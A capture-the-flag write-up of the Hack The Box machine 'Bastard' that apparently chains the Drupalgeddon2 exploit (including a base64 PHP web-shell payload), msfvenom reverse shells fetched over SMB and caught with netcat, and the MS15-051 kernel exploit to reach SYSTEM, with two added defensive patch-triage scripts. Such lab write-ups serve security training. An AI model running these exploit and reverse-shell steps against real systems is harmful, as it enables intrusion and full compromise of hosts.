My first step was to perform an Nmap scan against the machine:
# Nmap 7.91 scan initiated Fri Dec 18 14:03:28 2020 as: nmap -sV -sC -p- -oN scan -O 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.029s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 18 14:08:24 2020 -- 1 IP address (1 host up) scanned in 296.09 seconds
We can see from the output that there are a number of ports open: HTTP on port 80 running Drupal, and 135 and 49154 running MSRPC. I decided to start with port 80 as this is the one I'm most familiar with.
By browsing to http://10.10.10.9/CHANGELOG.txt you can see that it is running Drupal version 7.54. I used searchsploit to identify vulnerabilities in this version of Drupal.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# searchsploit drupal 7
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                               |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting                                                                         | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                 | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                   | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                 | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash Exploitation Vector                                                                | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                        | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                             | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                              | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                   | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                   | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                      | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                        | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                            | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                       | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                         | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                 | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                             | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (Metasploit)                            | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                   | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                           | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                       | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                              | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)         | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                            | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                             | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                        | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                               | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                 | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                       | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities  | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                             | php/remote/40130.rb
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
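The world-readable CHANGELOG.txt that gave away the version, together with the fixed-in thresholds visible in the searchsploit listing, is enough for a site owner to triage their own Drupal 7 installs. The script below is an added example, not code from the original writeup: the sample CHANGELOG text, the FIXED_IN table and the function names are constructed for it.

```python
import re
from typing import Optional

# First fixed release for the Drupal 7 core issues in the searchsploit listing
# above (searchsploit's "7.0 < 7.31" means 7.31 is still affected, so the fix is 7.32).
FIXED_IN = [
    ("Drupalgeddon SQL injection", "7.32"),
    ("Drupalgeddon2 remote code execution", "7.58"),
]

# Constructed sample of the top of a Drupal 7 CHANGELOG.txt; only the first
# "Drupal x.y" heading matters, the release notes here are illustrative.
SAMPLE_CHANGELOG = """
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed a regression from the previous release.
"""

VERSION_RE = re.compile(r"^Drupal\s+(\d+\.\d+(?:\.\d+)?)", re.MULTILINE)

def parse_version(changelog: str) -> Optional[str]:
    """Newest release named in a CHANGELOG.txt body, or None if it is not one."""
    m = VERSION_RE.search(changelog)
    return m.group(1) if m else None

def version_tuple(v: str) -> tuple:
    """'7.54' -> (7, 54) so releases compare numerically, not as strings."""
    return tuple(int(p) for p in v.split("."))

def exposures(version: str) -> list:
    """Listed issues whose fix release is newer than the running version."""
    current = version_tuple(version)
    return [name for name, fixed in FIXED_IN if current < version_tuple(fixed)]

def triage(changelog: str) -> dict:
    """What a defender learns from an exposed CHANGELOG.txt: the exact version
    leaks, and with it which of the listed issues still apply."""
    version = parse_version(changelog)
    if version is None:
        return {"version": None, "version_leaked": False, "exposures": []}
    return {"version": version, "version_leaked": True, "exposures": exposures(version)}
```

Blocking CHANGELOG.txt (and the other files robots.txt lists) removes the version leak but not the exposure; only the upgrade does.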
After some trial and error I discovered that the “Drupalgeddon2” exploit 44449.rb was successful.
┌──(root💀kali)-[/home/kali/Documents/bastard]
└─# ruby 44449 http://10.10.10.9
ruby: warning: shebang line ending with \r may cause problems
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo YVSJVABF
[+] Result : YVSJVABF
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root   (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root   (sites/default/files/)
[*] Moving  : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>>
You can see from the output that a shell was spawned and I was logged in as the user iusr. This shell, however, wasn't persistent, so I generated a reverse shell with msfvenom:
┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
I then started an SMB server on the Kali machine to host the reverse.exe reverse shell I just created:
┌──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/
I then started a netcat listener on the Kali machine on port 2600 to capture the reverse shell.
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
listening on [any] 2600 ...
The reverse shell was then downloaded to the Bastard machine using the drupalgeddon2 shell and executed.
drupalgeddon2>> copy \\10.10.14.19\testshare\reverse.exe
        1 file(s) copied.
drupalgeddon2>> reverse.exe
From the output below, you can see that the shell was successfully captured in netcat, and the user flag was captured.
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49739
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>cd /users
cd /users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35    <DIR>          .
19/03/2017  07:35    <DIR>          ..
19/03/2017  01:20    <DIR>          Administrator
19/03/2017  01:54    <DIR>          Classic .NET AppPool
19/03/2017  07:35    <DIR>          dimitris
14/07/2009  06:57    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  30.807.498.752 bytes free

C:\Users>cd dimitris
cd dimitris

C:\Users\dimitris>cd Desktop
cd Desktop

C:\Users\dimitris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\dimitris\Desktop

19/03/2017  08:04    <DIR>          .
19/03/2017  08:04    <DIR>          ..
19/03/2017  08:06                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.498.752 bytes free

C:\Users\dimitris\Desktop>type user.txt
type user.txt
[REDACTED]
The next step was to escalate privileges. I ran systeminfo and discovered that it was an unpatched Server 2008 machine.
C:\Users\dimitris\Desktop>systeminfo
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46
System Boot Time:          27/12/2020, 3:37:18
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.536 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.530 MB
Virtual Memory: In Use:    565 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
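The systeminfo output above is enough on its own to flag this host as unpatched: an RTM build (7600, i.e. no SP1) and "Hotfix(s): N/A". The script below is an added example, not from the original writeup: it parses systeminfo text and reports those two conditions plus a missing KB3045171, the MS15-051 fix whose number appears in the exploit archive name used later in the post. Both systeminfo excerpts are constructed, and EXAMPLE-HOST and KB0000000 are placeholders.

```python
import re

# Constructed systeminfo excerpt matching what the target reported above:
# RTM build 7600 and no hotfixes at all.
UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""

# Constructed excerpt of a host on SP1 (build 7601) that has the MS15-051 fix,
# KB3045171; EXAMPLE-HOST and KB0000000 are placeholders.
PATCHED = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3045171
                           [02]: KB0000000
"""

SP1_BUILD = 7601              # 6.1.7601 is Server 2008 R2 / Windows 7 SP1; 7600 is RTM
REQUIRED_KBS = {"KB3045171"}  # the MS15-051 (win32k.sys) fix, from the archive name

def parse_systeminfo(text: str) -> dict:
    """Turn systeminfo's 'Key: value' lines into a dict. Indented '[nn]: X'
    continuation lines are collected into a list under '<Key>_items'."""
    fields, last = {}, None
    for line in text.splitlines():
        cont = re.match(r"^\s+\[\d+\]:\s*(.+?)\s*$", line)
        if cont and last:
            fields.setdefault(last + "_items", []).append(cont.group(1))
            continue
        kv = re.match(r"^([^:]+?):\s*(.*?)\s*$", line)
        if kv and not line.startswith(" "):
            last = kv.group(1)
            fields[last] = kv.group(2)
    return fields

def patch_findings(text: str) -> list:
    """Findings that make a host an obvious kernel-exploit candidate."""
    f = parse_systeminfo(text)
    findings = []
    m = re.search(r"Build (\d+)", f.get("OS Version", ""))
    if m and int(m.group(1)) < SP1_BUILD:
        findings.append(f"pre-SP1 build {m.group(1)}")
    kbs = set(f.get("Hotfix(s)_items", []))
    if f.get("Hotfix(s)", "").upper() == "N/A" or not kbs:
        findings.append("no hotfixes installed")
    findings += [f"missing {kb}" for kb in sorted(REQUIRED_KBS - kbs)]
    return findings
```

Run over systeminfo output collected from a fleet, this turns the observation "Hotfix(s): N/A" into a queue of hosts to patch before someone else reads it the way this writeup does.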
Because of this, there are multiple kernel exploits that should be successful in escalating privileges. I decided to try MS15-051 as I had had some luck with this exploit in the past. I downloaded the ZIP file from the GitHub page, extracted the 64-bit exe and copied it into /var/www so it could be transferred to the Bastard machine.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# unzip MS15-051-KB3045171.zip
Archive:  MS15-051-KB3045171.zip
   creating: MS15-051-KB3045171/
  inflating: MS15-051-KB3045171/ms15-051.exe
  inflating: MS15-051-KB3045171/ms15-051x64.exe
   creating: MS15-051-KB3045171/Source/
   creating: MS15-051-KB3045171/Source/ms15-051/
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user
  inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib
  inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib
  inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt
   creating: MS15-051-KB3045171/Source/ms15-051/Win32/
  inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe
   creating: MS15-051-KB3045171/Source/ms15-051/x64/
  inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe
  inflating: MS15-051-KB3045171/Source/ms15-051.sln
  inflating: MS15-051-KB3045171/Source/ms15-051.suo

┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# ls
MS15-051-KB3045171  MS15-051-KB3045171.zip

┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# cd MS15-051-KB3045171

┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# ls
ms15-051.exe  ms15-051x64.exe  Source

┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# cp ms15-051x64.exe /var/www
When this exe is run, it takes the command you want to execute as the argument. So I decided to create another reverse shell going to port 2602 on the Kali machine; this is what I execute as the argument of the MS15-051 exploit, and I essentially get a SYSTEM-privilege reverse shell. I created the reverse shell:
┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2602 -f exe > reverse2602.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Then, on the Bastard machine, I copied both the reverse shell and the MS15-051 exploit over:
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\ms15-051x64.exe
copy \\10.10.14.19\testshare\ms15-051x64.exe
        1 file(s) copied.

C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\reverse2602.exe
copy \\10.10.14.19\testshare\reverse2602.exe
        1 file(s) copied.
A new netcat listener was then started on the Kali machine listening on port 2602 to capture the new reverse shell.
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602
listening on [any] 2602 ...
The exploit was then run:
C:\inetpub\drupal-7.54>ms15-051-x64.exe "reverse2602.exe"
ms15-051-x64.exe "reverse2602.exe"
'ms15-051-x64.exe' is not recognized as an internal or external command,
operable program or batch file.

C:\inetpub\drupal-7.54>ms15-051x64.exe "reverse2602.exe"
ms15-051x64.exe "reverse2602.exe"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 624 created.
==============================
You can see from the output below that the reverse SYSTEM shell was successfully captured, and I was able to capture the root flag.
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602
listening on [any] 2602 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49681
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>cd /
cd /

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35    <DIR>          .
19/03/2017  07:35    <DIR>          ..
19/03/2017  01:20    <DIR>          Administrator
19/03/2017  01:54    <DIR>          Classic .NET AppPool
19/03/2017  07:35    <DIR>          dimitris
14/07/2009  06:57    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  30.807.498.752 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator

19/03/2017  01:20    <DIR>          .
19/03/2017  01:20    <DIR>          ..
19/03/2017  01:20    <DIR>          Contacts
19/03/2017  07:33    <DIR>          Desktop
19/03/2017  02:09    <DIR>          Documents
19/03/2017  12:42    <DIR>          Downloads
19/03/2017  01:20    <DIR>          Favorites
19/03/2017  01:20    <DIR>          Links
19/03/2017  01:20    <DIR>          Music
19/03/2017  01:20    <DIR>          Pictures
19/03/2017  01:20    <DIR>          Saved Games
19/03/2017  01:20    <DIR>          Searches
19/03/2017  01:20    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  30.807.498.752 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator\Desktop

19/03/2017  07:33    <DIR>          .
19/03/2017  07:33    <DIR>          ..
19/03/2017  07:34                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.498.752 bytes free

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
[REDACTED]